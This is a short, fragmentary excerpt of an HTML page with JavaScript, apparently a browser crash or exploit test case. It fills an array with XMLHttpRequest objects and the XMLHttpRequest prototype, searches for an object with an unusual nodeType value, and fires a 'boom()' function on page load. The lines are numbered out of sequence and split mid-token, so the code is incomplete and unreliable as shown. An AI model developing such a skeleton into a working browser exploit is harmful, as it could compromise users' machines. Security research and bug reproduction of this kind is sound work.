4 <script type=
"text/javascript">
12 a
[45] = new XMLHttpRequest();
13 a
[48] = new XMLHttpRequest();
14 a
[53] = XMLHttpRequest
.prototype;
21 function search(a
, start
)
25 for (var j
= start
; j
< N
; ++j
) {
27 if (typeof e
== "object" && "nodeType" in e
&& e
.nodeType
== 99)
36 <body onload=
"boom();"></body>